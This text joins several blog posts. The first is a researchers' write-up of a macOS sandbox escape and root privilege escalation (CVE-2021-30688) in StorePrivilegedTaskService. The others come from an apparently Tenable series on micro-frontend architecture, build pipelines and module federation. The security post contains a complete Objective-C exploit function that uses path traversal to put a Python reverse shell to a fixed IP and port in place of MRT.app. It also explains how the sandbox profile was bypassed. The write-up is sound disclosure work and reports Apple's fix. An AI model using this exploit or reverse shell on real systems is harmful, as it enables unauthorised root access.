Normal view
Sandbox escape + privilege escalation in StorePrivilegedTaskService
CVE-2021-30688 is a vulnerability which was fixed in macOS 11.4 that allowed a malicious application to escape the Mac Application Sandbox and to escalate its privileges to root. This vulnerability required a strange exploitation path due to the sandbox profile of the affected service.
Background
At rC3 in 2020 and HITB Amsterdam 2021 Daan Keuper and Thijs Alkemade gave a talk on macOS local security. One of the subjects of this talk was the use of privileged helper tools and the vulnerabilities commonly found in them. To summarize, many applications install a privileged helper tool in order to install updates for the application. This allows normal (non-admin) users to install updates, which is normally not allowed due to the permissions on /Applications
. A privileged helper tool is a service which runs as root which used for only a specific task that needs root privileges. In this case, this could be installing a package file.
Many applications that use such a tool contain two vulnerabilities that in combination lead to privilege escalation:
- Not verifying if a request to install a package comes from the main application.
- Not correctly verifying the authenticity of an update package.
As it turns out, the first issue not only affects third-party developers, but even Apple itself! Although in a slightly different way…
About StorePrivilegedTaskService
StorePrivilegedTaskService
is a tool used by the Mac App Store to perform certain privileged operations, such as removing the quarantine flag of downloaded files, moving files and adding App Store receipts. It is an XPC service embedded in the AppStoreDaemon.framework
private framework.
To explain this vulnerability, it would be best to first explain XPC services and Mach services, and the difference between those two.
First of all, XPC is an inter-process communication technology developed by Apple which is used extensively to communicate between different processes in all of Apple’s operating systems. In iOS, XPC is a private API, usable only indirectly by APIs that need to communicate with other processes. On macOS, developers can use it directly. One of the main benefits of XPC is that it sends structured data, supporting many data types such as integers, strings, dictionaries and arrays. This can in many cases avoid the use of serialization functions, which reduces the possibility of vulnerabilities due to parser bugs.
XPC services
An XPC service is a lightweight process related to another application. These are launched automatically when an application initiates an XPC connection and terminated after they are no longer used. Communication with the main process happens (of course) over XPC. The main benefit of using XPC services is the ability to separate dangerous operations or privileges, because the XPC service can have different entitlements.
For example, suppose an application needs network functionality for only one feature: to download a fixed URL. This means that when sandboxing the application, it would need full network client access (i.e. the com.apple.security.network.client
entitlement). A vulnerability in this application can then also use the network access to send out arbitrary network traffic. If the functionality for performing the request would be moved to a different XPC service, then only this service would need the network permission. Compromising the main application would only allow it to retrieve that URL and compromising the XPC service would be unlikely, as it requires very little code. This pattern is how Apple uses these services throughout the system.
These services can have one of 3 possible service types:
- Application: each application initiating a connection to an XPC service spawns a new process (though multiple connections from one application are still handled in the same process).
- User: per user only one instance of an XPC service is running, handling requests from all applications running as that user.
- System: only one instance of the XPC service is running and it runs as root. Only available for Apple’s own XPC services.
Mach services
While XPC services are local to an application, Mach services are accessible for XPC connections system wide by registering a name. A common way to register this name is through a launch agent or launch daemon config file. This can launch the process on demand, but the process is not terminated automatically when no longer in use, like XPC services are.
For example, some of the mach services of lsd
:
/System/Library/LaunchDaemons/com.apple.lsd.plist:
<key>MachServices</key>
<dict>
<key>com.apple.lsd.advertisingidentifiers</key>
<true/>
<key>com.apple.lsd.diagnostics</key>
<true/>
<key>com.apple.lsd.dissemination</key>
<true/>
<key>com.apple.lsd.mapdb</key>
<true/>
...
Connecting to an XPC service using the NSXPCConnection
API:
[[NSXPCConnection alloc] initWithServiceName:serviceName];
while connecting to a mach service:
[[NSXPCConnection alloc] initWithMachServiceName:name options:options];
NSXPCConnection
is a higher-level Objective-C API for XPC connections. When using it, an object with a list of methods can be made available to the other end of the connection. The connecting client can call these methods just like it would call any normal Objective-C methods. All serialization of objects as arguments is handled automatically.
Permissions
XPC services in third-party applications rarely have interesting permissions to steal compared to a non-sandboxed application. Sanboxed services can have entitlements that create sandbox exceptions, for example to allow the service to access the network. Compared to a non-sandboxed application, these entitlements are not interesting to steal because the app is not sandboxed. TCC permissions are also usually set for the main application, not its XPC services (as that would generate rather confusing prompts for the end user).
A non-sandboxed application can therefore almost never gain anything by connecting to the XPC service of another application. The template for creating a new XPC service in Xcode does not even include a check on which application has connected!
This does, however, appear to give developers a false sense of security because they often do not add a permission check to Mach services either. This leads to the privileged helper tool vulnerabilities discussed in our talk. For Mach services running as root, a check on which application has connected is very important. Otherwise, any application could connect to the Mach service to request it to perform its operations.
StorePrivilegedTaskService vulnerability
Sandbox escape
The main vulnerability in the StorePrivilegedTaskService
XPC service was that it did not check the application initiating the connection. This service has a service type of System, so it would launch as root.
This vulnerability was exploitable due to defense-in-depth measures which were ineffective:
StorePrivilegedTaskService
is sandboxed, but its custom sandboxing profile is not restrictive enough.- For some operations, the service checked the paths passed as arguments to ensure they are a subdirectory of a specific directory. These checks could be bypassed using path traversal.
This XPC service is embedded in a framework. This means that even a sandboxed application could connect to the XPC service, by loading the framework and then connecting to the service.
[[NSBundle bundleWithPath:@"/System/Library/PrivateFrameworks/AppStoreDaemon.framework/"] load];
NSXPCConnection *conn = [[NSXPCConnection alloc] initWithServiceName:@"com.apple.AppStoreDaemon.StorePrivilegedTaskService"];
The XPC service offers a number of interesting methods that can be called from the application using an NSXPCConnection
. For example:
// Write a file
- (void)writeAssetPackMetadata:(NSData *)metadata toURL:(NSURL *)url withReplyHandler:(void (^)(NSError *))replyHandler;
// Delete an item
- (void)removePlaceholderAtPath:(NSString *)path withReplyHandler:(void (^)(NSError *))replyHandler;
// Change extended attributes for a path
- (void)setExtendedAttributeAtPath:(NSString *)path name:(NSString *)name value:(NSData *)value withReplyHandler:(void (^)(NSError *))replyHandler;
// Move an item
- (void)moveAssetPackAtPath:(NSString *)path toPath:(NSString *)toPath withReplyHandler:(void (^)(NSError *))replyHandler;
A sandbox escape was quite clear: write a new application bundle, use the method -setExtendedAttributeAtPath:name:value:withReplyHandler:
to remove its quarantine flag and then launch it. However, this also needs to take into account the sandbox profile of the XPC service.
The service has a custom profile. The restriction related to files and folders are:
(allow file-read* file-write*
(require-all
(vnode-type DIRECTORY)
(require-any
(literal "/Library/Application Support/App Store")
(regex #"\.app(download)?(/Contents)?")
(regex #"\.app(download)?/Contents/_MASReceipt(\.sb-[a-zA-Z0-9-]+)?")))
(require-all
(vnode-type REGULAR-FILE)
(require-any
(literal "/Library/Application Support/App Store/adoption.plist")
(literal "/Library/Preferences/com.apple.commerce.plist")
(regex #"\.appdownload/Contents/placeholderinfo")
(regex #"\.appdownload/Icon")
(regex #"\.app(download)?/Contents/_MASReceipt((\.sb-[a-zA-Z0-9-]+)?/receipt(\.saved)?)"))) ;covers temporary files the receipt may be named
(subpath "/System/Library/Caches/com.apple.appstored")
(subpath "/System/Library/Caches/OnDemandResources")
)
The intent of these rules is that this service can modify specific files in applications currently downloading from the app store, so with a .appdownload
extension. For example, adding a MASReceipt
file and changing the icon.
The regexes here are the most interesting, mainly because they are attached neither on the left nor right. On the left this makes sense, as the full path could be unknown, but the lack of binding it on the right (with $
) is a mistake for the file regexes.
Formulated simply, we can do the following with this sandboxing profile:
- All operations are allowed on directories containing
.app
anywhere in their path. - All operations are allowed on files containing
.appdownload/Icon
anywhere in their path.
By creating a specific directory structure in the temporary files directory of our sandboxed application:
bar.appdownload/Icon/
Both the sandboxed application and the StorePrivilegedTaskService have full access inside the Icon
folder. Therefore, it would be possible to create a new application here and then use -setExtendedAttributeAtPath:name:value:withReplyHandler:
on the executable to dequarantine it.
Privesc
This was already a nice vulnerability, but we were convinced we could escalate privileges to root as well. Having a process running as root creating new files in chosen directories with specific contents is such a powerful primitive that privilege escalation should be possible. However, the sandbox requirements on the paths made this difficult.
Creating a new launch daemon or cron jobs are common ways for privilege escalation by file creation, but the sandbox profile path requirements would only allow a subdirectory of a subdirectory of the directories for these config files, so this did not work.
An option that would work would be to modify an application. In particular, we found that Microsoft Teams would work. Teams is one of the applications that installs a launch daemon for installing updates. However, instead of copying a binary to /Library/PrivilegedHelperTools
, the daemon points into the application bundle itself:
/Library/LaunchDaemons/com.microsoft.teams.TeamsUpdaterDaemon.plist
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>Label</key>
<string>com.microsoft.teams.TeamsUpdaterDaemon</string>
<key>MachServices</key>
<dict>
<key>com.microsoft.teams.TeamsUpdaterDaemon</key>
<true/>
</dict>
<key>Program</key>
<string>/Applications/Microsoft Teams.app/Contents/TeamsUpdaterDaemon.xpc/Contents/MacOS/TeamsUpdaterDaemon</string>
</dict>
</plist>
The following would work for privilege escalation:
- Ask
StorePrivilegedTaskService
to move/Applications/Microsoft Teams.app
somewhere else. Allowed, because the path of the directory contains.app
.1 - Move a new app bundle to
/Applications/Microsoft Teams.app
, which contains a malicious executable file atContents/TeamsUpdaterDaemon.xpc/Contents/MacOS/TeamsUpdaterDaemon
. - Connect to the
com.microsoft.teams.TeamsUpdaterDaemon
Mach service.
However, a privilege escalation requiring a specific third-party application to be installed is not as convincing as a privilege escalation without this requirement, so we kept looking. The requirements are somewhat contradictory: typically anything bundled into an .app
bundle runs as a normal user, not as root. In addition, the Signed System Volume on macOS Big Sur means changing any of the built-in applications is also impossible.
By an impressive and ironic coincidence, there is an application which is installed on a new macOS installation, not on the SSV and which runs automatically as root: MRT.app
, the “Malware Removal Tool”. Apple has implemented a number of anti-malware mechanisms in macOS. These are all updateable without performing a full system upgrade because they might be needed quickly. This means in particular that MRT.app
is not on the SSV. Most malware is removed by signature or hash checks for malicious content, MRT is the more heavy-handed solution when Apple needs to add code for performing the removal.
Although MRT.app
is in an app bundle, it is not in fact a real application. At boot, MRT is run as root to check if any malware needs removing.
Our complete attack follows the following steps, from sandboxed application to code execution as root:
- Create a new application bundle
bar.appdownload/Icon/foo.app
in the temporary directory of our sandboxed application containing a malicious executable. - Load the
AppStoreDaemon.framework
framework and connect to theStorePrivilegedTaskService
XPC service. - Ask
StorePrivilegedTaskService
to change the quarantine attribute for the executable file to allow it to launch without a prompt. - Ask
StorePrivilegedTaskService
to move/Library/Apple/System/Library/CoreServices/MRT.app
to a different location. - Ask
StorePrivilegedTaskService
to movebar.appdownload/Icon/foo.app
from the temporary directory to/Library/Apple/System/Library/CoreServices/MRT.app
. - Wait for a reboot.
See the full function here:
/// The bar.appdownload/Icon part in the path is needed to create files where both the sandbox profile of StorePrivilegedTaskService and the Mac AppStore sandbox of this process allow acccess.
NSString *path = [NSTemporaryDirectory() stringByAppendingPathComponent:@"bar.appdownload/Icon/foo.app"];
NSFileManager *fm = [NSFileManager defaultManager];
NSError *error = nil;
/// Cleanup, if needed.
[fm removeItemAtPath:path error:nil];
[fm createDirectoryAtPath:[path stringByAppendingPathComponent:@"Contents/MacOS"] withIntermediateDirectories:TRUE attributes:nil error:&error];
assert(!error);
/// Create the payload. This example uses a Python reverse shell to 192.168.1.28:1337.
[@"#!/usr/bin/env python\n\nimport socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect((\"192.168.1.28\",1337)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call([\"/bin/sh\",\"-i\"]);" writeToFile:[path stringByAppendingPathComponent:@"Contents/MacOS/MRT"] atomically:TRUE encoding:NSUTF8StringEncoding error:&error];
assert(!error);
/// Make the payload executable
[fm setAttributes:@{NSFilePosixPermissions: [NSNumber numberWithShort:0777]} ofItemAtPath:[path stringByAppendingPathComponent:@"Contents/MacOS/MRT"] error:&error];
assert(!error);
/// Load the framework, so the XPC service can be resolved.
[[NSBundle bundleWithPath:@"/System/Library/PrivateFrameworks/AppStoreDaemon.framework/"] load];
NSXPCConnection *conn = [[NSXPCConnection alloc] initWithServiceName:@"com.apple.AppStoreDaemon.StorePrivilegedTaskService"];
conn.remoteObjectInterface = [NSXPCInterface interfaceWithProtocol:@protocol(StorePrivilegedTaskInterface)];
[conn resume];
/// The new file is now quarantined, because this process created it. Change the quarantine flag to something which is allowed to run.
/// Another option would have been to use the `-writeAssetPackMetadata:toURL:replyHandler` method to create an unquarantined file.
[conn.remoteObjectProxy setExtendedAttributeAtPath:[path stringByAppendingPathComponent:@"Contents/MacOS/MRT"] name:@"com.apple.quarantine" value:[@"00C3;60018532;Safari;" dataUsingEncoding:NSUTF8StringEncoding] withReplyHandler:^(NSError *result) {
NSLog(@"%@", result);
assert(result == nil);
srand((unsigned int)time(NULL));
/// Deleting this directory is not allowed by the sandbox profile of StorePrivilegedTaskService: it can't modify the files inside it.
/// However, to move a directory, the permissions on the contents do not matter.
/// It is moved to a randomly named directory, because the service refuses if it already exists.
[conn.remoteObjectProxy moveAssetPackAtPath:@"/Library/Apple/System/Library/CoreServices/MRT.app/" toPath:[NSString stringWithFormat:@"/System/Library/Caches/OnDemandResources/AssetPacks/../../../../../../../../../../../Library/Apple/System/Library/CoreServices/MRT%d.app/", rand()]
withReplyHandler:^(NSError *result) {
NSLog(@"Result: %@", result);
assert(result == nil);
/// Move the malicious directory in place of MRT.app.
[conn.remoteObjectProxy moveAssetPackAtPath:path toPath:@"/System/Library/Caches/OnDemandResources/AssetPacks/../../../../../../../../../../../Library/Apple/System/Library/CoreServices/MRT.app/" withReplyHandler:^(NSError *result) {
NSLog(@"Result: %@", result);
/// At launch, /Library/Apple/System/Library/CoreServices/MRT.app/Contents/MacOS/MRT -d is started. So now time to wait for that...
}];
}];
}];
Fix
Apple has pushed out a fix in the macOS 11.4 release. They implemented all 3 of the recommended changes:
- Check the entitlements of the process initiating the connection to
StorePrivilegedTaskService
. - Tightened the sandboxing profile of
StorePrivilegedTaskService
. - The path traversal vulnerabilities for the subdirectory check were fixed.
This means that the vulnerability is not just fixed, but reintroducing it later is unlikely to be exploitable again due to the improved sandboxing profile and path checks. We reported this vulnerability to Apple on January 19th, 2021 and a fix was released on May 24th, 2021.
-
This is actually a quite interesting aspect of the macOS sandbox: to delete a directory, the process needs to have
file-write-unlink
permission on all of the contents, as each file in it must be deleted. To move a directory somewhere else, only permissions on the directory itself and its destination are needed! ↩︎
9. Wrapping Up Our Journey Implementing a Micro Frontend
Wrapping Up Our Journey Implementing a Micro Frontend
We hope you now have a better understanding of how you can successfully create a micro-front end architecture. Before we call it a day, let’s give a quick recap of what was covered.
What You Learned
- Why We implemented a micro front end architecture — You learned where we started, specifically what our architecture used to look like and where the problems existed. You then learned how we planned on solving those problems with a new architecture.
- Introducing the Monorepo and NX — You learned how we combined two of our repositories into one: a monorepo. You then saw how we leveraged the NX framework to identify which part of the repository changed, so we only needed to rebuild that portion.
- Introducing Module Federation — You learned how we leverage webpacks module federation to break our main application into a series of smaller applications called micro-apps, the purpose of which was to build and deploy these applications independently of one another.
- Module Federation — Managing Your Micro-Apps — You learned how we consolidated configurations and logic pertaining to our micro-apps so we could easily manage and serve them as our codebase continued to grow.
- Module Federation — Sharing Vendor Code — You learned the importance of sharing vendor library code between applications and some related best practices.
- Module Federation — Sharing Library Code — You learned the importance of sharing custom library code between applications and some related best practices.
- Building and Deploying — You learned how we build and deploy our application using this new model.
Key Takeaways
If you take anything away from this series, let it be the following:
The Earlier, The Better
We can tell you from experience that implementing an architecture like this is much easier if you have the opportunity to start from scratch. If you are lucky enough to start from scratch when building out an application and are interested in a micro-frontend, laying the foundation before anything else is going to make your development experience much better.
Evaluate Before You Act
Before you decide on an architecture like this, make sure it’s really what you want. Take the time to assess your issues and how your company operates. Without company support, pulling off this approach is extremely difficult.
Only Build What Changed
Using a tool like NX is critical to a monorepo, allowing you to only rebuild those parts of the system that were impacted by a change.
Micro-front Ends Are Not For Everyone
We know this type of architecture is not for everyone, and you should truly consider what your organization needs before going down this path. However, it has been very rewarding for us, and has truly transformed how we deliver solutions to our customers.
Don’t Forget To Share
When it comes to module federation, sharing is key. Learning when and how to share code is critical to the successful implementation of this architecture.
Be Careful Of What You Share
Sharing things like state between your micro-apps is a dangerous thing in a micro-frontend architecture. Learning to put safeguards in place around these areas is critical, as well as knowing when it might be necessary to deploy all your applications at once.
Summary
We hope you enjoyed this series and learned a thing or two about the power of NX and module federation. If this article can help just one engineer avoid a mistake we made, then we’ll have done our job. Happy coding!
9. Wrapping Up Our Journey Implementing a Micro Frontend was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.
8. Building & Deploying
Building & Deploying
This is post 8 of 9 in the series
- Introduction
- Why We Implemented a Micro Frontend
- Introducing the Monorepo & NX
- Introducing Module Federation
- Module Federation — Managing Your Micro-Apps
- Module Federation — Sharing Vendor Code
- Module Federation — Sharing Library Code
- Building & Deploying
- Summary
Overview
This article documents the final phase of our new architecture where we build and deploy our application utilizing our new micro-frontend model.
The Problem
If you have followed along up until this point, you can see how we started with a relatively simple architecture. Like a lot of companies, our build and deployment flow looked something like this:
- An engineer merges their code to master.
- A Jenkins build is triggered that lints, tests, and builds the entire application.
- The built application is then deployed to a QA environment.
- End-2-End (E2E) tests are run against the QA environment.
- The application is deployed to production. If it’s a CICD flow this occurs automatically if E2E tests pass, otherwise this would be a manual deployment.
In our new flow this would no longer work. In fact, one of our biggest challenges in implementing this new architecture was in setting up the build and deployment process to transition from a single build (as demonstrated above) to multiple applications and libraries.
The Solution
Our new solution involved three primary Jenkins jobs:
- Seed Job — Responsible for identifying what applications/libraries needed to be rebuilt (via the nx affected command). Once this was determined, its primary purpose was to then kick off n+ of the next two jobs discussed.
- Library Job — Responsible for linting and testing any library workspace that was impacted by a change.
- Micro-App Jobs — A series of jobs pertaining to each micro-app. Responsible for linting, testing, building, and deploying the micro-app.
With this understanding in place, let’s walk through the steps of the new flow:
Phase 1 — In our new flow, phase 1 includes building and deploying the code to our QA environments where it can be properly tested and viewed by our various internal stakeholders (engineers, quality assurance, etc.):
- An engineer merges their code to master. In the diagram below, an engineer on Team 3 merges some code that updates something in their application (Application C).
- The Jenkins seed job is triggered, and it identifies what applications and libraries were impacted by this change. This job now kicks off an entirely independent pipeline related to the updated application. In this case, it kicked off the Application C pipeline in Jenkins.
- The pipeline now lints, tests, and builds Application C. It’s important to note here how it’s only dealing with a piece of the overall application. This greatly improves the overall build times and avoids long queues of builds waiting to run.
- The built application is then deployed to the QA environments.
- End-2-End (E2E) tests are run against the QA environments.
- Our deployment is now complete. For our purposes, we felt that a manual deployment to production was a safe approach for us and one that still offered us the flexibility and efficiency we needed.
Phase 2 — This phase (shown in the diagram after the dotted line) occurred when an engineer was ready to deploy their code to production:
- An engineer deployed their given micro-app to staging. In this case, the engineer would go into the build for Application C and deploy from there.
- For our purposes, we deployed to a staging environment before production to perform a final spot check on our application. In this type of architecture, you may only encounter a bug related to the decoupled nature of your micro-apps. You can read more about this type of issue in the previous article under the Sharing State/Storage/Theme section. This final staging environment allowed us to catch these issues before they made their way to production.
- The application is then deployed to production.
While this flow has more steps than our original one, we found that the pros outweigh the cons. Our builds are now more efficient as they can occur in parallel and only have to deal with a specific part of the repository. Additionally, our teams can now move at their own pace, deploying to production when they see fit.
Diving Deeper
Before You Proceed: The remainder of this article is very technical in nature and is geared towards engineers who wish to learn the specifics of how we build and deploy our applications.
Build Strategy
We will now discuss the three job types discussed above in more detail. These include the following: seed job, library job, and micro-app jobs.
The Seed Job
This job is responsible for first identifying what applications/libraries needed to be rebuilt. How is this done? We will now come full circle and understand the importance of introducing the NX framework that we discussed in a previous article. By taking advantage of this framework, we created a system by which we could identify which applications and libraries (our “workspaces”) were impacted by a given change in the system (via the nx affected command). Leveraging this functionality, the build logic was updated to include a Jenkins seed job. A seed job is a normal Jenkins job that runs a Job DSL script and in turn, the script contains instructions that create and trigger additional jobs. In our case, this included micro-app jobs and/or a library job which we’ll discuss in detail later.
Jenkins Status — An important aspect of the seed job is to provide a visualization for all the jobs it kicks off. All the triggered application jobs are shown in one place along with their status:
- Green — Successful build
- Yellow — Unstable
- Blue — Still processing
- Red (not shown) — Failed build
Github Status — Since multiple independent Jenkins builds are triggered for the same commit ID, we had to pay attention to the representation of the changes in GitHub to not lose visibility of broken builds in the PR process. Each job registers itself with a unique context with respect to github, providing feedback on what sub-job failed directly in the PR process:
Performance, Managing Dependencies — Before a given micro-app and/or library job can perform its necessary steps (lint, test, build), it needs to install the necessary dependencies for those actions (those defined in the package.json file of the project). Doing this every single time a job is run is very costly in terms of resources and performance. Since all of these jobs need the same dependencies, it makes much more sense if we can perform this action once so that all the jobs can leverage the same set of dependencies.
To accomplish this, the node execution environment was dockerised with all necessary dependencies installed inside a container. As shown below, the seed job maintains the responsibility for keeping this container in sync with the required dependencies. The seed job determines if a new container is required by checking if changes have been made to package.json. If changes are made, the seed job generates the new container prior to continuing any further analysis and/or build steps. The jobs that are kicked off by the seed (micro-app jobs and the library job) can then leverage that container for use:
This approach led to the following benefits:
- Proved to be much faster than downloading all development dependencies for each build (step) every time needed.
- The use of a pre-populated container reduced the load on the internal Nexus repository manager as well as the network traffic.
- Allowed us to run the various build steps (lint, unit test, package) in parallel thus further improving the build times.
Performance, Limiting The Number Of Builds Run At Once — To facilitate the smooth operation of the system, the seed jobs on master and feature branch builds use slightly different logic with respect to the number of builds that can be kicked off at any one time. This is necessary as we have a large number of active development branches and triggering excessive jobs can lead to resource shortages, especially with required agents. When it comes to the concurrency of execution, the differences between the two are:
- Master branch — Commits immediately trigger all builds concurrently.
- Feature branches — Allow only one seed job per branch to avoid system overload as every commit could trigger 10+ sub jobs depending on the location of the changes.
Another attempt to reduce the amount of builds generated is the way in which the nx affected command gets used by the master branch versus the feature branches:
- Master branch — Will be called against the latest tag created for each application build. Each master / production build produces a tag of the form APP<uniqueAppId>_<buildversion>. This is used to determine if the specific application needs to be rebuilt based on the changes.
- Feature branches — We use master as a reference for the first build on the feature branch, and any subsequent build will use the commit-id of the last successful build on that branch. This way, we are not constantly rebuilding all applications that may be affected by a diff against master, but only the applications that are changed by the commit.
To summarize the role of the seed job, the diagram below showcases the logical steps it takes to accomplish the tasks discussed above.
The Library Job
We will now dive into the jobs that Seed kicks off, starting with the library job. As discussed in our previous articles, our applications share code from a libs directory in our repository.
Before we go further, it’s important to understand how library code gets built and deployed. When a micro-app is built (ex. nx build host), its deployment package contains not only the application code but also all the libraries that it depends on. When we build the Host and Application 1, it creates a number of files starting with “libs_…” and “node_modules…”. This demonstrates how all the shared code (both vendor libraries and your own custom libraries) needed by a micro-app is packaged within (i.e. the micro-apps are self-reliant). While it may look like your given micro-app is extremely bloated in terms of the number of files it contains, keep in mind that a lot of those files may not actually get leveraged if the micro-apps are sharing things appropriately.
This means building the actual library code is a part of each micro-app’s build step, which is discussed below. However, if library code is changed, we still need a way to lint and test that code. If you kicked off 5 micro-app jobs, you would not want each of those jobs to perform this action as they would all be linting and testing the exact same thing. Our solution to this was to have a separate Jenkins job just for our library code, as follows:
- Using the nx affected:libs command, we determine which library workspaces were impacted by the change in question.
- Our library job then lints/tests those workspaces. In parallel, our micro-apps also lint, test and build themselves.
- Before a micro-app can finish its job, it checks the status of the libs build. As long as the libs build was successful, it proceeds as normal. Otherwise, all micro-apps fail as well.
The Micro-App Jobs
Now that you understand how the seed and library jobs work, let’s get into the last job type: the micro-app jobs.
Configuration — As discussed previously, each micro-app has its own Jenkins build. The build logic for each application is implemented in a micro-app specific Jenkinsfile that is loaded at runtime for the application in question. The pattern for these small snippets of code looks something like the following:
The jenkins/Jenkinsfile.template (leveraged by each micro-app) defines the general build logic for a micro-application. The default configuration in that file can then be overwritten by the micro-app:
This approach allows all our build logic to be in a single place, while easily allowing us to add more micro-apps and scale accordingly. This combined with the job DSL makes adding a new application to the build / deployment logic a straightforward and easy to follow process.
Managing Parallel Jobs — When we first implemented the build logic for the jobs, we attempted to implement as many steps as possible in parallel to make the builds as fast as possible, which you can see in the Jenkins parallel step below:
After some testing, we found that linting + building the application together takes about as much time as running the unit tests for a given product. As a result, we combined the two steps (linting, building) into one (assets-build) to optimize the performance of our build. We highly recommend you do your own analysis, as this will vary per application.
Deployment strategy
Now that you understand how the build logic works in Jenkins, let’s see how things actually get deployed.
Checkpoints — When an engineer is ready to deploy their given micro-app to production, they use a checkpoint. Upon clicking into the build they wish to deploy, they select the checkpoints option. As discussed in our initial flow diagram, we force our engineers to first deploy to our staging environment for a final round of testing before they deploy their application to production.
Once approval is granted, the engineer can then deploy the micro-app to production using another checkpoint:
S3 Strategy — The new logic required a rework of the whole deployment strategy as well. In our old architecture, the application was deployed as a whole to a new S3 location and then the central gateway application was informed of the new location. This forced the clients to reload the entire application as a whole.
Our new strategy reduces the deployment impact to the customer by only updating the code on S3 that actually changed. This way, whenever a customer pulls down the code for the application, they are pulling a majority of the code from their browser cache and only updated files have to be brought down from S3.
One thing we had to be careful about was ensuring the index.html file is only updated after all the granular files are pushed to S3. Otherwise, we run the risk of our updated application requesting files that may not have made their way to S3 yet.
Bootstrapper Job — As discussed above, micro-apps are typically deployed to an environment via an individual Jenkins job:
However, we ran into a number of instances where we needed to deploy all micro-apps at the same time. This included the following scenarios:
- Shared state — While we tried to keep our micro-apps as independent of one another as possible, we did have instances where we needed them to share state. When we made updates to these areas, we could encounter bugs when the apps got out of sync.
- Shared theme — Since we also had a global theme that all micro-apps inherited from, we could encounter styling issues when the theme was updated and apps got out of sync.
- Vendor Library Update — Updating a vendor library like react where there could be only one version of the library loaded in.
To address these issues, we created the bootstrapper job. This job has two steps:
- Build — The job is run against a specific environment (qa-development, qa-staging, etc.) and pulls down a completely compiled version of the entire application.
- Deploy — The artifact from the build step can then be deployed to the specified environment.
Conclusion
Our new build and deployment flow was the final piece of our new architecture. Once it was in place, we were able to successfully deploy individual micro-apps to our various environments in a reliable and efficient manner. This was the final phase of our new architecture, please see the last article in this series for a quick recap of everything we learned.
8. Building & Deploying was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.
7. Module Federation — Sharing Library Code
Module Federation — Sharing Library Code
This is post 7 of 9 in the series
- Introduction
- Why We Implemented a Micro Frontend
- Introducing the Monorepo & NX
- Introducing Module Federation
- Module Federation — Managing Your Micro-Apps
- Module Federation — Sharing Vendor Code
- Module Federation — Sharing Library Code
- Building & Deploying
- Summary
Overview
This article focuses on the importance of sharing your custom library code between applications and some related best practices.
The Problem
As discussed in the previous article, sharing code is critical to using module federation successfully. In the last article we focused on sharing vendor code. Now, we want to take those same principles and apply them to the custom library code we have living in the libs directory. As illustrated below, App A and B both use Lib 1. When these micro-apps are built, they each contain a version of that library within their build artifact.
Assuming you read the previous article, you now know why this is important. As shown in the diagram below, when App A is loaded in, it pulls down all the libraries shown. When App B is loaded in it’s going to do the same thing. The problem is once again that App B is pulling down duplicate libraries that App A has already loaded in.
The Solution
Similar to the vendor libraries approach, we need to tell module federation that we would like to share these custom libraries. This way once we load in App B, it’s first going to check and see what App A has already loaded and leverage any libraries it can. If it needs a library that hasn’t been loaded in yet (or the version it needs isn’t compatible with the version App A loaded in), then it will proceed to load on its own. Otherwise, if it’s the only micro-app using that library, it will simply bundle a version of that library within itself (ex. Lib 2).
Diving Deeper
Before You Proceed: The remainder of this article is very technical in nature and is geared towards engineers who wish to learn more about sharing custom library code between your micro-apps. If you wish to see the code associated with the following section, you can check it out in this branch.
To demonstrate sharing libraries, we’re going to focus on Test Component 1 that is imported by the Host and Application 1:
This particular component lives in the design-system/components workspace:
We leverage the tsconfig.base.json file to build out our aliases dynamically based on the component paths defined in that file. This is an easy way to ensure that as new paths are added to your libraries, they are automatically picked up by webpack:
How does webpack currently treat this library code? If we were to investigate the network traffic before sharing anything, we would see that the code for this component is embedded in two separate files specific to both Host and Application 1 (the code specific to Host is shown below as an example). At this point the code is not shared in any way and each application simply pulls the library code from its own bundle.
As your application grows, so does the amount of code you share. At a certain point, it becomes a performance issue when each application pulls in its own unique library code. We’re now going to update the shared property of the ModuleFederationPlugin to include these custom libraries.
Sharing our libraries is similar to the vendor libraries discussed in the previous article. However, the mechanism of defining a version is different. With vendor libraries, we were able to rely on the versions defined in the package.json file. For our custom libraries, we don’t have this concept (though you could technically introduce something like that if you wanted). To solve this problem, we decided to use a unique identifier to identify the library version. Specifically, when we build a particular library, we actually look at the folder containing the library and generate a unique hash based off of the contents of the directory. This way, if the contents of the folder change, then the version does as well. By doing this, we can ensure micro-apps will only share custom libraries if the contents of the library match.
Note: We are once again leveraging the tsconfig.base.json to dynamically build out the libs that should be shared. We used a similar approach above for building out our aliases.
If we investigate the network traffic again and look for libs_design-system_components (webpack’s filename for the import from @microfrontend-demo/design-system/components), we can see that this particular library has now been split into its own individual file. Furthermore, only one version gets loaded by the Host application (port 3000). This indicates that we are now sharing the code from @microfrontend-demo/design-system/components between the micro-apps.
Going More Granular
Before You Proceed: If you wish to see the code associated with the following section, you can check it out in this branch.
Currently, when we import one of the test components, it comes from the index file shown below. This means the code for all three of these components gets bundled together into one file shown above as “libs_design-system_components_src_index…”.
Imagine that we continue to add more components:
You may get to a certain point where you think it would be beneficial to not bundle these files together into one big file. Instead, you want to import each individual component. Since the alias configuration in webpack is already leveraging the paths in the tsconfig.base.json file to build out these aliases dynamically (discussed above), we can simply update that file and provide all the specific paths to each component:
We can now import each one of these individual components:
If we investigate our network traffic, we can see that each one of those imports gets broken out into its own individual file:
This approach has several pros and cons that we discovered along the way:
Pros
- Less Code To Pull Down — By making each individual component a direct import and by listing the component in the shared array of the ModuleFederationPlugin, we ensure that the micro-apps share as much library code as possible.
- Only The Code That Is Needed Is Used — If a micro-app only needs to use one or two of the components in a library, they aren’t penalized by having to import a large bundle containing more than they need.
Cons
- Performance — Bundling, the process of taking a number of separate files and consolidating them into one larger file, is a really good thing. If you continue down the granular path for everything in your libraries, you may very well find yourself in a scenario where you are importing hundreds of files in the browser. When it comes to browser performance and caching, there’s a balance to loading a lot of small granular files versus a few larger ones that have been bundled.
We recommend you choose the solution that works best based on your codebase. For some applications, going granular is an ideal solution and leads to the best performance in your application. However, for another application this could be a very bad decision, and your customers could end up having to pull down a ton of granular files when it would have made more sense to only have them pull down one larger file. So as we did, you’ll want to do your own performance analysis and use that as the basis for your approach.
Pitfalls
When it came to the code in our libs directory, we discovered two important things along the way that you should be aware of.
